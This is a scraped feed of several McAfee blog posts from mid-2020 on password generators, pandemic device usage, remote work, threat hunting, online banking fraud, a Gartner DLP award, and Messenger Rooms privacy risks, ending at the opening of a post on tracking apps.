While website security has become increasingly strong over the past decade or so, the security measures that a site owner takes don’t matter if a hacker is able to get into your account by guessing your password, which is why it’s essential that you create a strong password that will hold up to hacking attempts.

Weak Passwords can Lead to Many Problems

Without a strong password, you run the risk of experiencing identity theft or financial fraud, both of which can significantly damage your finances and livelihood if the issue isn’t corrected immediately. Keep in mind that some of the more popular passwords in the country include 123456, password, 111111, qwerty, and abc123. Because of how popular these passwords are, they are some of the first that hackers will use to attempt to get into an account.

Hackers Can Control Your Entire Account

Once a hacker has breached your account, they can do a variety of things. The primary of which involves aquiring financial information that can be found in your account. These individuals can also choose to make purchases with this account or send in requests for new credit cards under your name. Along with stealing your own money, it’s possible for hackers to ruin your credit, which could take years to remedy.

Hackers Could Breach Your Computer

It’s important to understand that hackers can also get into your computer. Though more difficult, hackers can access documents and personal information on your computer if they are able to guess the password to your operating system. Many people store the passwords that they use in a document that’s stored on their computer, which is done with the belief that a hacker will never get into the computer itself. In the event that a hacker gains access to your device, they would be able to read the document where your passwords are stored. While having a strong password doesn’t eliminate the possibility of being hacked, it will make it much more difficult for someone to gain access to your computer or online accounts.

Using a Password Generator

If you need to store important personal or financial information online or on your computer, it’s essential that you pair your devices and accounts with strong passwords that will hold up to hacking attempts. Even though you can create lengthy and strong passwords without any assistance, keep in mind that the average U.S. citizen has around 25-30 accounts that passwords are needed for. Attempting to identify the perfect password on your own and for each account that you create can be a time-consuming and laborious process. Password generators are designed to instantly provide you with passwords that should be very difficult to guess.

How Password Generators Work

While every password generator is somewhat unique, the best generators are ones that provide you with options on what you would like to include in the password. The majority of password generators will automatically create passwords that are at least 15 characters long, consist of symbols and numbers, and include uppercase and lowercase letters. However, certain generators also provide users with the ability to exclude similar and ambiguous characters from the password that’s generated. Once you have generated a password, all that’s left is for you to input it into the account you’re currently creating. Password generators are simple to use and can make your life easier as you attempt to keep your personal information safe and secure.

Extra Features to Look For in Password Generator

Password generators can come with many extra features that could prove helpful in keeping your accounts and computer secure. For instance, some services provide users with a master password, which means that all of your passwords and secure information are kept under a single password that only you know. Some tools also allow users to set the exact length of the password, which could consist of anywhere from 8-100 characters. Additional features to be on the lookout for include unlimited password storage, 24/7 support, and custom security controls.

McAfee True Key Features

One potential password manager and generator you can use is McAfee True Key, which is designed to create very lengthy and strong passwords. Some of the core features of this particular tool include local data encryption, the support of numerous browsers, syncing across PC, Mac, iOS, and Android devices, and many different methods for signing in. For instance, you could pair the True Key app with the fingerprint reader on your device. You can also use the app to import any stored passwords from your browser.

How to Create a Strong Password

There are a myriad of things that you can do to create a strong password, the easiest of which is to use a password generator that will automatically provide you with a randomized password that will hold up well to hackers. While using a password generator is the most convenient option for creating a strong password, there are some additional tips and guidelines that you should keep in mind.

Primary Guidelines for Creating a Great Password

The main guidelines to keep in mind when creating a strong password include:

  • Make sure that your password is at least 7-8 characters long
  • Make sure that you never use a word or symbol for your password that can easily be found on any of your social media pages
  • Change each password you use at an interval or 90 days or less, which should also be done for any strong passwords you use
  • Use a combination of numbers, special characters, uppercase letters, and lowercase letters
  • Don’t use the same password for numerous accounts, which heightens the possibility that a breach into one of your accounts could lead to several accounts being compromised
  • Never write down your password on a piece of paper, which only serves to heighten the possibility of the password being seen by another individual and copied down
  • Consider using numbers and letters for your password that have no identifiable patterns within

Stay protected

Passwords are essential for security and can help you keep your computer and online accounts safe from hackers. While financial fraud and cases of stolen identity may be able to be corrected without any lasting damage to your bank account or credit score, the hassle that comes with contacting banking institutions and fixing any issues pertaining to the hack is more than it’s worth. Even though the aforementioned tips should assist you in creating a strong password, it’s highly recommended that you use a password generator instead, which ensures that mistakes are avoided completely and that the passwords you use are secure.

The post Create Strong Passwords with a Password Generator appeared first on McAfee Blogs.

]]>
Devices and Distancing: What Digital Data Says About Life From Home https://www.mcafee.com/blogs/consumer/devices-and-distancing/ Tue, 14 Jul 2020 16:29:49 +0000 /blogs/?p=102637

Devices and Distancing: What Digital Data Says About Life From Home With millions of us keeping life closer to home in these past months, what can our devices and apps tell us about how we’ve passed that time? Plenty. Usage stats, location data, app downloads, and daily active users, all drawn from anonymized data, are […]

The post Devices and Distancing: What Digital Data Says About Life From Home appeared first on McAfee Blogs.

]]>

Devices and Distancing: What Digital Data Says About Life From Home

With millions of us keeping life closer to home in these past months, what can our devices and apps tell us about how we’ve passed that time? Plenty.

Usage stats, location data, app downloads, and daily active users, all drawn from anonymized data, are all common statistics that get reported on a regular basis. What makes them particularly insightful this year is to see how they’ve increased, decreased, or remained steady as nations and communities have put distancing measures in place. How are we living differently and what role are our devices playing in them?

That’s a rather large question, and different data sets, measurements, and methodologies will point to different insights. However, looking at a few of them together can help us associate some figures with the way our day-to-day experience has changed and continues to evolve.

Our own data shows people are using their desktop and laptop computers more

Using the McAfee PC app, which is always running and protecting (our customers) people  in the background, we’re able to look at general PC use. The inference here is that increased use of a desktop or laptop PC (especially during weekdays) indicates an uptick in people engaging in remote work, learning, or play. Our figures are drawn from pseudonymized or anonymized device records aggregated to a country level, with at least 1,000 devices counted.

What did our numbers specifically show? You can visit our Safer Together page and take a country-by-country view of the data, which starts in February. (See our interactive heat map at the bottom of the page.) A quick capsule summary of select nations is below:

PC Usage by Month


Unsurprisingly, the most marked jump in home PC use occurs during the stretch that measures March to April, which marks the period when stay at home guidance rolled into place for many. From there, those increases held relatively steady. Looking at the change from April to May, it appears that people largely stayed at home as well.

Beyond that, June’s week-by-week trends saw usage in Australia and India both increase steadily. The U.S., UK, and Germany also trended upward overall, while France and Italy trended downward.

Other apps and technologies point to other trends

Dating apps saw a big spike in downloads and usage during the same stretch of time. According to dating app Bumble, the end of March saw an 84% increase in the number of its video calls and voice chats. On March 29th, the Tinder dating app reported the highest number of swipes ever in one day up to that point—some 3 billion. As we shared in an article earlier this year about safely dating from home, perhaps this shouldn’t come as any surprise because dating apps are designed to bring people together. In periods of isolation, it follows that people would use them to reach out and make connections where they can.

There’ve been plenty of similar stories (and some surprises) in the news in recent weeks, as various firms, publications, and service providers share the some of the digital trends they’ve spotted, such as:

  • In April, online analysis firm Apptopia reported a marked decrease in mobile phone screen time and an increase in time on desktop browsers as people switched to bigger screens. They also tracked a major spike in the download of home improvement retailer apps in the U.S., such as Lowe’s, Home Depot, and Menards—up 69% year-over-year.
  • PC Magazine reports that internet usage surged 47% in January-March of this year. One statistic that underscores this increase is the percentage of people who consume more than 1TB of data in a month. This went from 4.2% of subscribers in the start of 2019 to 10% in the first quarter of 2020. That’s a more than 2x increase in so-called power users.
  • The same report shared further insights, such as collaboration tool Microsoft Teams setting a record for 2.7 billion meeting minutes in a single day and collaboration platform Slack seeing an 80% increase in paid customers over the previous quarter. Likewise, video conferencing tool Zoom saw its daily participants increase by 2,900% in the quarter compared to December 2019.
  • OpenTable, which provides online restaurant reservations across nearly 60,000 restaurants globally and seats 134 million diners monthly, have put out their own data as well. Their “State of the Restaurant Industry” figures offer few surprises as to hard-hit restaurants around the world have been. By making week-to-week comparisons between 2019 and 2020, it shows that seatings in early June are down roughly 75% globally compared to last year. Later in the month, they are still down 63% compared to the time same last year as well.

 

Looking ahead: more working from home?

While these statistics each provide their own snapshot of life during lockdown in retrospective, what remains to be seen is how the time we’ve spent at home will shape the way we work, learn, socialize, and entertain ourselves in the months to come. At least right now, it seems that people are wanting or expecting to see change. A new study from McAfee surveyed 1,000 working adults in the U.S. between the ages of 18 and 74 in May 2020 and found that nearly half (47%) of employees do not want to go back to working how they were before stay-at-home measures were put in place.

However that plays out in the future, it’s important to protect ourselves today while we continue to rely on our devices so heavily. Comprehensive security protection, like McAfee Total Protection, can help protect devices against malware, phishing attacks, and other threats. Additionally, it includes McAfee WebAdvisor that can help identify malicious websites.

And one last stat: according to Nielsen, there was an 85% increase in American streaming rates in the first three weeks of March this year compared to March 2019 reports. Again, no surprise. Yet one thing to be on the lookout for are phishing and malware attacks associated with movies and shows that are offered for a “free” stream or download. It’s a common method of attack, and we’ve compiled our Top 10 U.S. List of TV and Movie Titles That Could Lead You to a Dangerous Download. Give the article a look. Not only does it name the titles, it offers you great advice for keeping safe.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Devices and Distancing: What Digital Data Says About Life From Home appeared first on McAfee Blogs.

]]>
How to Adopt a Work-from-Home Mindset https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/how-to-adopt-a-work-from-home-mindset/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/how-to-adopt-a-work-from-home-mindset/#respond Tue, 14 Jul 2020 15:24:03 +0000 /blogs/?p=102556

By: Paige, Change Management Manager, Plano, TX, United States In the last few months, navigating through the pandemic has yielded changes in every aspect of our daily lives.  Because of COVID-19, many companies have suddenly moved to full remote work. My husband and I received news about this and school closings while our family was […]

The post How to Adopt a Work-from-Home Mindset appeared first on McAfee Blogs.

]]>

By: Paige, Change Management Manager, Plano, TX, United States

In the last few months, navigating through the pandemic has yielded changes in every aspect of our daily lives.  Because of COVID-19, many companies have suddenly moved to full remote work. My husband and I received news about this and school closings while our family was on spring break.

As you guessed, we weren’t exactly ready to dive into all the rapid changes—even as seasoned remote workers. Being an active member of McAfee’s Virtual Culture Club (VCC), a group that brings global remote team members together, I made sure to incorporate what I’ve learned from these connections.

Now that I’ve spent significant time managing work and three boys from home, here are my four remote work adoption tips for parents who are also playing educator like me.

Tip No. #1: Schedule Breaks

Before the pandemic, I preferred to work through lunch, so I could attend my children’s soccer and tennis games, volunteer or take over for my husband who manages school pickup, starts the kids on homework and prepares dinner. We had a pretty good routine and it worked well for us.

In our new norm, there is no such thing as a routine anymore. We had to become comfortable with that. In my work schedule, meetings with varied times are constant for me since my role supports business in different places around the globe. At the start of the pandemic, our children transitioned to online classes, which also occur at different times and days each week.

The change in routine and moving schedules took a while to become familiar with. I had to start blocking out time to fit in preparing lunch for the kids, eating meals and making time for a short walk around the neighborhood to get out and feel the sun. Once I started doing that, I felt so much lighter.

Plan breaks away from your computer and make space to get energy out with your family.

Tip No. #2: Allow Your Professional and Personal Life to Collide

Our professional and personal lives occupy the same space now. I believe you can still manage both successfully. Though having a dedicated office space to work is necessary, I encourage you to let your kids pull up a chair to draw, craft or even read a book alongside you. This will help reduce any pressure you may have about balancing your time as a parent. Sometimes, our children just want to be near us.

Recently, McAfee hosted an Online Safety Session series virtually on Facebook, where cybersecurity experts shared knowledge and best practices with parents, teachers and kids to stay safe online. I was able to invite my oldest child to sit next to me, so we could watch it together. It was a win-win—a learning opportunity for her, a way to inspire them with my career space and a chance to spend time together.

When possible, find opportunities to break up your work day with positive family interactions.

Tip No. #3: Sprinkle in a Little Joy

A few months ago, my youngest child, who is a preschooler, started to practice writing on sticky notes and handing them to me while I was working. I’d smile, thank him and put the notes to the side of my laptop. Dissatisfied with my placement, he would quickly put the note on top of my laptop and made sure it stayed on there with extra tape every time I stepped away. Now, every time I close my laptop and see his note, it brings me great joy.

There are many ways to add joy in your day when you work from home:

  • Take a selfie with something that caught your attention on your lunch walks and send it to your team
  • Treat yourself to a food delivery you’re craving with no judgment
  • Play your favorite song loudly between meetings

Make time for the smallest joys that makes you happy every day.

Tip. No. 4: Remember: Change is Hard, Empathy isn’t

As a change manager, I know firsthand that change is hard. Change is expected. And throughout my career experiences, I’ve learned that change is constant. It’s also okay to feel what you are feeling. We need to have grace for one another when there is an occasional interruption from kids or even pets. If you can be a great worker in the office, you can be a great worker at home.

During video conference calls, sometimes my kids enjoy making cameo appearances so they can see my teammates. My teammates, and especially my leader, always reassure me, “Paige, do not worry about it. It’s totally fine.” Now, when we have extra time at the end of a team meeting, we introduce our kids, pets or partners.

Remember, we are all in this together, globally. We are all adjusting.

If you’re looking at new opportunities in a thriving culture that will provide you with balance and flexibility, search McAfee’s current openings.

The post How to Adopt a Work-from-Home Mindset appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/how-to-adopt-a-work-from-home-mindset/feed/ 0
Time to Get Proactive About Threat Hunting https://www.mcafee.com/blogs/enterprise/security-operations/time-to-get-proactive-about-threat-hunting/ https://www.mcafee.com/blogs/enterprise/security-operations/time-to-get-proactive-about-threat-hunting/#respond Mon, 13 Jul 2020 18:38:50 +0000 /blogs/?p=102601

When I think about the many challenges that threat hunters face nowadays, trust me when I say that I feel their pain. Early in my career, I was a Security Engineer in a SOC who scrambled into action upon receiving the proverbial midnight call about an incident.   The system I was part of wasn’t perfect as we always were […]

The post Time to Get Proactive About Threat Hunting appeared first on McAfee Blogs.

]]>

When I think about the many challenges that threat hunters face nowadays, trust me when I say that I feel their pain. Early in my career, I was a Security Engineer in a SOC who scrambled into action upon receiving the proverbial midnight call about aincident.  

The system I was part of wasn’t perfect as we always were one step behind our adversaries. Still, we still held the line by deploying an assortment of security technologies to minimize any damage. Enterprises essentially adopted a reactive “whack-a-mole” approach, where defenders would address one-off vulnerabilities as they popped up. But we face a new cyber security landscape that makes it clear we need to adopt a new, more proactive approach to threat hunting. 

Are We a Target? 

In the past, cyber security was generally treated as an afterthought by senior management. No longer. Company boards are finally attuned to the grave challenge that cyber security poses to their businesses. While boards are willing to make cyber security investments, they also want to make sure they’re getting the maximum return from investments in the tools that CISOs say they need.   

However, they’re not going to be patient if their cyber security strategy still rests upon waiting for the next phishing email to infect the network before defenders start to swing into action. Enterprises don’t have the luxury, especially not in the current threat landscape where they are being targeted by cohorts of increasingly sophisticated attackers. This has implications for everyone involved in the enterprise cyber security chain – from the CISO to the most junior analyst on the SOC team.  

Threat hunters must be able to synthesize external threat feeds and data into useful context to know whether the organization is a target. And they also need actionable information to take steps that bolster the organization’s overall security posture  this can involve anything from ordering a general lockdown to tweaking policies that better secure end points or the web gateway.   

Unfortunately, this proactive capacity still remains out of reach for most companies. Fewer than 20% of breaches are getting stopped in a timely fashion because threat hunters lack the tools that might supply the kind of timely, actionable context I’m talking about. 

Boards aren’t going to be patient if their threat hunting approach is the equivalent of calling in the firemen only after the blaze starts. The organization needs to know ahead of time what’s happening in their cyber neighborhood, not after the fact. 

The Rise of the Strategic Threat Hunter 

That puts added pressure on threat hunters to get ahead of the problem before it’s a problemAs the average cost of data breaches continues to climb, tomuch is at risk by keeping the status quo. Remediation and resolution after the fact no longer cuts it. But ithreat hunters know ahead of time who is being targeted and what endpoints are going to be impactedthat’s a game-changer. At that point, they can take proactive measures to protect their organizations. 

At McAfee, our portfolio of technologies not only extends protection across all endpoints and the cloud but also streamlines the process of investigation, allowing threat hunters to drill down across vectors, industries and regions. We cross-correlate known campaigns using industry and geographical threat activity with an organization’s own endpoint security posture derived from its security telemetry.   

That’s a major boon for threat hunters who now can glean accurate insights into the potential constellation of potential security risks. They no longer need to manually pick through disparate pieces of data, separating out false positives from real indications of trouble. So, instead of wasting precious time on busy work, they apply their talents to the task of finding the most effective way to deal with incoming threats.  

Even on a good day, the threat hunter’s job is hard enough. Without the necessary information to help understand the bigger picture, it looks more like Mission Impossible. But with a recently announced, uniquely, proactive, MVISION Insights in hand, threat hunters can finally flip the script to take the fight to the bad guys. Remember: the best defense is always a good offense. 

Check it out—our Chief Scientist Raj Samani weighs on MVISION Insights. 

The post Time to Get Proactive About Threat Hunting appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/security-operations/time-to-get-proactive-about-threat-hunting/feed/ 0
Online Banking—Simple Steps to Protect Yourself from Bank Fraud https://www.mcafee.com/blogs/consumer/online-banking-simple-steps-to-protect-yourself-from-bank-fraud/ https://www.mcafee.com/blogs/consumer/online-banking-simple-steps-to-protect-yourself-from-bank-fraud/#respond Mon, 13 Jul 2020 17:51:06 +0000 /blogs/?p=102613

Online Banking—Simple Steps to Protect Yourself from Bank Fraud Even if you’re not big on online banking, online banking is big on you. Online banking is well on its way to becoming a cornerstone of the banking experience overall. More and more transactions occur over the internet rather than at a teller’s window, and nearly […]

The post Online Banking—Simple Steps to Protect Yourself from Bank Fraud appeared first on McAfee Blogs.

]]>

Online Banking—Simple Steps to Protect Yourself from Bank Fraud

Even if you’re not big on online banking, online banking is big on you. Online banking is well on its way to becoming a cornerstone of the banking experience overall. More and more transactions occur over the internet rather than at a teller’s window, and nearly every account has a username, password, and PIN associated with it. Whether you use online banking regularly or sparingly, you can protect yourself from being the victim of fraud by following a few straightforward steps.

Online banking is growing, and here to stay

First off, online banking is no longer a novelty. It hasn’t been for some time. In fact, it’s now an expectation. As recently as 2018, a global survey from Deloitte found that 73% of consumers use online banking at least once a month and 59% of respondents use mobile banking apps—a number which has only increased since then. Looking yet more broadly, the country of Sweden is on track to become the world’s first cashless society by 2023. While the rest of the world may not be scrambling to forgo cash altogether, we can look at point-of-sale data and see that more and more people are going cashless with even their smallest of transactions.

Here’s how you can protect yourself from online banking fraud

There’s no doubt about it. We live in a world where banking, shopping, and payments revolve around a username and password. That’s quite a bit to take in, particularly if your first experiences with banking involved walking into a branch, getting a paper passbook, and maybe even a free toaster for opening an account.

So, how do you protect yourself? Consider the following:

Use a strong password—and a password manager to keep them straight

Start here. Passwords are your first line of defense. However, one thing that can be a headache is the number of passwords we have to juggle—a number that seems like it’s growing every day. Look around online and you’ll see multiple studies and articles stating that the average person has upwards of 80 to manage. Even if you have just a small percentage of those, strongly consider using a password manager. A good choice will generate strong, unique passwords for each of your accounts and store them securely for you.

In general, don’t use simple passwords that people can guess or easily glean from other sources (like your birthday, your child’s birthday, the name of your pet, and so on). Additionally, make them unique. Don’t repeat their use from account to account. That’s a quick way to see one hack lead to many others.

Use two-factor authentication to protect your accounts

What exactly is two-factor authentication? It’s an extra layer of defense for your accounts. In practice, it means that in addition to providing a password, you also receive a special one-time-use code to access your account. That code may be sent to you via email or to your phone by text. In some cases, you can also receive that code by a call to your phone. Basically, two-factor authentication combines two things: something you know, like your password; and something you have, like your smartphone. Together, that makes it tougher for scammers to hack into your accounts.

Two-factor authentication is practically a standard, so much so that you already might be using it right now when you bank or use certain accounts. If not, you can see if your bank offers it as an option in your settings the next time you log in. Or, you can contact your bank for help to get it set up.

Avoid phishing attacks: Look at your email inbox with a skeptical eye

Phishing is a popular way for crooks to steal personal information by way of email, where a crook will look to phish (“fish”) personal and financial information out of you. No two phishing emails look alike. They can range from a request from a stranger posing as a lawyer who wants you to assist with a bank transfer—to an announcement about (phony) lottery winnings, “Just send us your bank information and we’ll send your prize to you!” Those are a couple of classics. However, phishing emails have become much more sophisticated in recent years. Now, slicker hackers will pose as banks, online stories, and credit card companies, often using well-designed emails that look almost the same as the genuine article.

Of course, those emails are fakes. The links they embed in those emails lead you to them—not the legitimate organization that they claim to be—for the purpose of stealing personal info or directing a payment their way. Telltale signs are if the phishing email is sent from an address that slightly alters the brand name or adds to it by simply tacking extra language at the end of it. If you get one of these emails, don’t click any of the links. Contact the institute in question yourself using a phone number or address posted on their official website. This is a good rule of thumb in general. The best avenue of communication is the one you’ve used and trusted before.

Be skeptical about calls as well. Fraudsters use the phone too.

It may seem a little traditional, yet criminals still like to use the phone. In fact, they rely on the fact that many still view the phone as a trusted line of communication. This is known as “vishing,” which is short for “voice phishing.” The aim is the same as it is with phishing. The fraudster is looking to lure you into a bogus financial transaction or attempting to steal information, whether that’s financial, personal, or both. They may call you directly, posing as your bank or even as Microsoft tech support, or they may send you a text or email that directs you to call their number.

For example, a crook may call and introduce themselves as being part of your bank or credit card company with the word that “there are questions about your account” or something similar. In these cases, politely hang up. Next, call your bank or credit card company to follow up on your own. If the initial call was legitimate, you’ll quickly find out and can handle the issue properly. If you get a call from a scammer, they can be very persuasive. Remember, though. You’re in charge. You can absolutely hang up and then follow up using a phone number you trust.

Steer clear of financial transactions on public Wi-Fi in cafes, hotels, and libraries

There’s a good reason not to use public Wi-Fi: it’s not private. They’re public networks, and that means they’re unsecured and shared by everyone who’s using it, which allows hackers to read any data passing along it like an open book. That includes your accounts and passwords if you’re doing any banking or shopping on it. The best advice here is to wait and handle those things at home if possible. (Or connect to the public Wi-Fi with a VPN service, which we’ll cover just below in a moment.)
If not, you can always use your smartphone’s data connection to create a personal hotspot for your laptop, which will be far more secure. Another option is to simply use your smartphone alone. With a combination of your phone’s data connection and an app from your bank, you can take care of business that way instead of using public Wi-Fi. That said, be aware of your physical surroundings too. Make sure no one is looking over your shoulder!

Protecting your banking and finances even further

Some basic digital hygiene will go a long way toward protecting you even more—not just your banking and finances, but all the things you do online as well. The following quick list can help:
Update your software – That includes the operating system of your computers, smartphones, and tablets, along with the apps that are on them. Many updates include security upgrades and fixes that make it tougher for hackers to launch an attack.
Lock up – Your computers, smartphones, and tablets will have a way of locking them with a PIN, a password, your fingerprint, or your face. Take advantage of that protection, which is particularly important if your device is lost or stolen.
Use security softwareProtecting your devices with comprehensive security software will defend you against the latest virus, malware, spyware and ransomware attacks plus further protect your privacy and identity.
Consider connecting with a VPN – also known as a “virtual private network,” a VPN helps you stay safer with bank-grade encryption and private browsing. It’s a particularly excellent option if you find yourself needing to use public Wi-Fi because a VPN effectively makes a public network private.
Check your credit report – this is an important thing to do in today’s password- and digital-driven world. Doing so will uncover any inconsistencies or outright instances of fraud and put you on the path to setting them straight. In the U.S., you can do this for free once a year. Just drop by the FTC website for details on your free credit report.

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Online Banking—Simple Steps to Protect Yourself from Bank Fraud appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/online-banking-simple-steps-to-protect-yourself-from-bank-fraud/feed/ 0
We’re Named 2020 Gartner Peer Insights Customers’ Choice for Enterprise DLP https://www.mcafee.com/blogs/enterprise/endpoint-security/were-named-2020-gartner-peer-insights-customers-choice-for-enterprise-dlp/ https://www.mcafee.com/blogs/enterprise/endpoint-security/were-named-2020-gartner-peer-insights-customers-choice-for-enterprise-dlp/#respond Tue, 07 Jul 2020 19:47:22 +0000 /blogs/?p=102580

The McAfee team is very proud to announce today that, for the second time in a row1, McAfee was named a Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention for its McAfee Data Loss Prevention Solution. We see the recognition as an historic landmark for McAfee because it represents a trifecta of Gartner distinction this […]

The post We’re Named 2020 Gartner Peer Insights Customers’ Choice for Enterprise DLP appeared first on McAfee Blogs.

]]>

The McAfee team is very proud to announce today that, for the second time in a row1, McAfee was named a Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention for its McAfee Data Loss Prevention Solution. We see the recognition as an historic landmark for McAfee because it represents a trifecta of Gartner distinction this year: We now were named a 2020 Gartner Peer Insight Customers’ Choice for the three McAfee products that are integrated to make up the innovative cloud-native McAfee MVISION Unified Cloud platform: McAfee MVISION Cloud Access Security Broker, McAfee Secure Web Gateway, and McAfee Data Loss Prevention. McAfee Unified Cloud is a framework for implementing a Secure Access Service Edge (SASE) architecture and a safe way to accelerate digital transformation with cloud services, enable cloud and internet access from any device, and allow ultimate workforce productivity.

 

In its announcement, Gartner explains, “The Gartner Peer Insights Customers’ Choice is a recognition of vendors in this market by verified end-user professionals, taking into account both the number of reviews and the overall user ratings.” To ensure fair evaluation, Gartner maintains rigorous criteria for recognizing vendors with a high customer satisfaction rate.

For this distinction, a vendor must have a minimum of 50+ published reviews with an average overall rating of 4.3 stars or higher. McAfee received 75 reviews and an overall 4.3 rating out of 5, as of 31 May 2020, accordingly.

Here are some quotes from customers that contributed to this distinction:

“Great Product, Broad Protection, Easy to Use.”

 “McAfee DLP offers broad coverage of protection. The product is easy to deploy and use. We have deployed the solution to 100K+ endpoint devices with minimum issues. DLP rules are easy to configure. Integration with other vendor products is smooth.

Manager Cybersecurity, Security & Risk Management, in Transportation Industry: Read full review here

“Implementation Is Easy and It Provides Universal Data Protection Across Endpoints.”

“McAfee DLP is the best solution for Data Loss Prevention tool. It has a lot of features to safeguard the sensitive data. It has ability to connect and synchronize on-premises DLP and cloud DLP policies with single administrative portal and lots of other features like integration with third party tool for analytics which helps the InfoSec teams to safeguard the data and view the details of every endpoints.”

Programmer Analyst, Applications, Finance Industry : Read full review here

To learn more about this distinction, or to read the reviews written about our products by the IT professionals who use them, please visit Gartner Peer Insights’ Customers’ Choice announcement for Enterprise Data Loss Prevention. To all of our customers who submitted reviews, thank you! These reviews mold our products and our customer journey, and we look forward to building on the experience that earned us this distinction!

1McAfee was named a Gartner Peer Insights Customers’ Choice in 2018 and 2020; Gartner did not have one for the Enterprise DLP category in 2019.

The GARTNER PEER INSIGHTS CUSTOMERS’ CHOICE badge is a trademark and service mark of Gartner, Inc., and/or its affiliates, and is used herein with permission. All rights reserved. Gartner Peer Insights Customers’ Choice constitute the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; they neither represent the views of, nor constitute an endorsement by, Gartner or its affiliate.

The post We’re Named 2020 Gartner Peer Insights Customers’ Choice for Enterprise DLP appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/endpoint-security/were-named-2020-gartner-peer-insights-customers-choice-for-enterprise-dlp/feed/ 0
Messenger Rooms: New Video Chat Option is Fun But Has Risks https://www.mcafee.com/blogs/consumer/family-safety/messenger-rooms-new-video-chat-option-is-fun-but-has-risks/ https://www.mcafee.com/blogs/consumer/family-safety/messenger-rooms-new-video-chat-option-is-fun-but-has-risks/#respond Sat, 04 Jul 2020 14:00:31 +0000 /blogs/?p=102508 Messenger Rooms

One of the many things we’ve learned during this season of being homebound is that video chats with friends can save the day. One of the newest channels for video chatting is Messenger Rooms. While the new Facebook feature isn’t groundbreaking in terms of how it works, it’s the ability to pull together a big […]

The post Messenger Rooms: New Video Chat Option is Fun But Has Risks appeared first on McAfee Blogs.

]]>
Messenger Rooms

Messenger RoomsOne of the many things we’ve learned during this season of being homebound is that video chats with friends can save the day. One of the newest channels for video chatting is Messenger Rooms. While the new Facebook feature isn’t groundbreaking in terms of how it works, it’s the ability to pull together a big group of friends spontaneously that may make this a popular digital hangout for kids.

The Basics

Messenger Rooms functions similarly to the popular video conferencing app Zoom. The exception: There’s no need for users (or guests) to download a new app, create an account, or send out pre-planned meeting invites.

Messenger Rooms is simple. One person sets up a Messenger Room, that Room is assigned a URL, the organizer sends his or her friends that link, and those friends can instantly click it and be in the room. With so many families still opting to avoid large gatherings, Rooms may be the next best way to socialize in the most organic, pre-pandemic way.

The app makes it easy to watch movies together since one user screen can be pinned to the top of the chat for shared viewing. Kids can also have game nights, birthday parties, organize workout and study groups, or have a “squad hangout” as the Room title options call out (see graphic, below).

The Fun 

A few specific features may make Messenger Rooms appealing to kids. First, it’s easy to drop friends a link and be together almost instantly in a private room. Messenger Rooms is free, doesn’t have time limits, and up to 50 friends can get together in one room — from anywhere in the world. Kids joining a Room from their mobile app can apply quirky filters to their backgrounds or faces, which brings in the creativity element they get from Instagram Stories and Snapchat.

The Risks

Privacy. So far, privacy seems to be the biggest concern being raised and here’s why. Messenger Rooms, like Facebook, collects metadata from users — including guests without Facebook accounts. Metadata may include the people you talk with, at what times, and how often, all of which can be shared with a third party. Also, Messenger Rooms, while it does not record calls (like Zoom), lacks end-to-end encryption, which makes the channel vulnerable to hackers and compromises private conversations.

Troublemakers. Live chat rooms are not password-protected, so if a Room organizer decides to make a Room public or fails to lock a room they intended to be private, anyone can pop in and do anything. Much like the Zoom bombers emerging, anyone could crash a meeting with racial rants or graphic content. A link to a room can also be shared with others by anyone who has the link.

Cyberbullying. As with any app, conflicts can arise as can cyberbullying or harassment.

The Conversation

If you notice your kids using Messenger Rooms, you may consider having a few conversations that highlight the risks.

  • Privacy settings. If you organize a Room, lock it to keep unwanted people from crashing your meet up.
  • Nothing is private. Messenger Rooms isn’t encrypted, so it’s not the place to have private conversations or share sensitive content. Note: The internet in any form isn’t the place to share any personal content. Anything exchanged online — even a “private” text between two people — is vulnerable to hackers, device theft, or the possibility of a relationship falling out.
  • Nothing is free. Remind your children that services online are free for a reason. There is always an exchange: Free use for data. Be aware that profile information and bits of a conversation could be mined and used by a third party. To understand better how data is collected, Facebook’s help center or data policy.
  • Lock your room. Unless your child adjusts his or her preferences, it will be open to anyone that person is friends with on Facebook who will see the public Room at the top of their newsfeed. That means lovable Uncle Pete may mistakenly stumble into your daughter’s “squad” rant unless the Room is locked.
  • Report and block. If an unwanted person disrupts a Room kids can block the user and report it to Facebook.
  • Age-appropriate options. For kids under 13 (Facebook age requirement), there’s Messenger Kids, a Facebook feature that allows younger kids to video call with friends in a parentally-supervised room. It’s a great tool for teaching kids safe, online practices before they use the real thing.

To stay ahead of the digital hangouts available to kids, visit McAfee Consumer Family Safety blogs each week. You may also consider monitoring your child’s devices with parental controls designed to filter content, monitor screen time, and track new apps.

The post Messenger Rooms: New Video Chat Option is Fun But Has Risks appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/messenger-rooms-new-video-chat-option-is-fun-but-has-risks/feed/ 0
How to Protect Your Privacy From Tracking Apps https://www.mcafee.com/blogs/consumer/consumer-threat-notices/how-to-protect-your-privacy-from-tracking-apps/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/how-to-protect-your-privacy-from-tracking-apps/#respond Thu, 02 Jul 2020 17:23:10 +0000 /blogs/?p=102379 Working from home

Apps – what would life be without them? Imagine opening a brand-new browser tab every time you wanted to check your email, access photos, connect with friends on social media, or even pay your bills online. Apps have greatly enhanced the way consumers interact with and complete tasks on their mobile devices. But what many […]

The post How to Protect Your Privacy From Tracking Apps appeared first on McAfee Blogs.

]]>
Working from home

Apps – what would life be without them? Imagine opening a brand-new browser tab every time you wanted to check your email, access photos, connect with friends on social media, or even pay your bills online.

